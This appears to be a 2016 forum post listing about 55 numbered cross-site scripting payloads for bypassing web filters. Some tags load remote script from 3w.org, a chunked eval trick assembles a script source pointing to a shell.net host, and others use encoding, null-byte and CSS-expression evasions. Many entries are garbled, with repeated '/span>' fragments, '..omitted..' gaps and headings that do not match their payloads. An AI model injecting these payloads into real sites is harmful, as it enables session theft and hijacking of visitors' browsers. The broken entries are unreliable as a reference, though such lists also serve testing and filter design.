
XSS Attack Summary

Posted on 2016-4-28 10:06:15
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around a character limit (all pieces must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere they can be used

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag

<IMG SRC=\'#\'"   javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escaped quotes filtered

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META refresh URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>